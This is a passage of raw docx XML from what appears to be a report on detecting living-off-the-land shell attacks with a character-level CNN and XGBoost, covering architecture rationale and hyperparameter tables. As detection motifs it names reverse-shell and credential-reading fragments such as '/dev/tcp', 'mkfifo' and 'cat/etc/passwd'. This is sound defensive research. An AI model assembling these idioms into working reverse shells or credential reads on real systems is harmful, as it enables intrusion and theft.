        <w:t>./qJWIJu99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and base64 blobs mean a word/token model faces near-infinite out-of-vocabulary at test time. Character n-grams generalize across unseen tokens by sharing sub-word structure — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-rf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — and shell frequently omits the whitespace a word tokenizer needs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). A convolution of width </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over character embeddings is exactly a learned character-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-gram detector, so it keys on the operators and idioms that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the tradecraft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Parallel kernels of sizes 3/5/7.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LotL syntax lives at several scales at once: width-3 catches short motifs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>), width-5 mid-length tokens (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkfifo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:r>
        <w:t>), width-7 longer signatures (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">base64 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Running the three widths </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>in parallel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (not stacked) extracts features at all three receptive fields from the same input and concatenates them (128 × 3 = 384-dim) rather than committing to one width; global max-pooling each branch makes detection position-invariant, so a reverse-shell motif is caught wherever it appears in the line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kim, Y. (2014), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Convolutional Neural Networks for Sentence Classification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, EMNLP 2014 — the multiple-parallel-filter-width CNN adopted here at the character level (with Zhang, Zhao &amp; LeCun (2015), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Character-level Convolutional Networks for Text Classification</w:t>
      </w:r>
      <w:r>
        <w:t>, NeurIPS 2015, motivating the character granularity).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Explicit hyperparameter choices and rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XGBoost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>build_xgboost*</w:t>
      </w:r>
      <w:r>
        <w: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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scale_pos_weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The data is 1:3 attack:benign, so there are 3× more negatives; setting the positive-class gradient weight to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>neg/pos = 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> rebalances the loss so the minority attack class is learned instead of being swamped. Ch. 7 shows this is the dominant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> dial (FPR 0.049 → 0.145 from 1.0 → 5.0) with F1 flat — i.e. it sets the operating point, and 3.0 is the recall-favoring default a detector wants.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The best-F1 point in the Ch. 7 sweep (0.7354 at 12 vs 0.7329 at 6), adopted after full-data re-validation: the deeper trees lift the full XGBoost-hybrid from F1 0.853 (depth 6) → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.871</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on Dataset 1. The trade-off is transfer robustness (§8.2) — the extra capacity fits corpus style harder, so depth-12 also transfers worst.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Peak F1 in the sweep; 400 mildly overfits (0.733 → 0.725).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>learning_rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Peak F1 (0.733); 0.01 underfits (0.685), 0.3 rolls over (0.718).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tree_method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`hist`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Histogram binning for fast, memory-light training.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>objective</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>eval_metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>binary:logistic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>logloss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Calibrated probabilistic output needed for the TPR@fixed-FPR metrics and for cascade thresholding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>random_state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reproducibility.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1D-CNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CNNClassifier</w:t>
      </w:r>
      <w:r>
        <w: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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>embed_dim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Character vocabulary is small (~50–60 symbols); Ch. 7 shows 32 is the saturation point (16 underfits at F1 0.805, 64 adds cost and FPR without F1 gain).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>num_filters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (per kernel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Best F1/FPR balance (0.830 / 0.055); 256 nudges F1 up but raises FPR (0.070).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>kernel_sizes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>(3, 5, 7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Multi-scale character-n-gram detectors, per §6.2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dropout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Regularizes the 384-dim concatenation before the linear head; kept as the conservative default (0.1 edged higher on the subsample but reads as a small-data artifact per Ch. 7).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>class-weighted cross-entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The tree-model </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scale_pos_weight</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> analog: inverse-frequency class weights up-weight the minority attack class under the 1:3 prior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>optimizer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
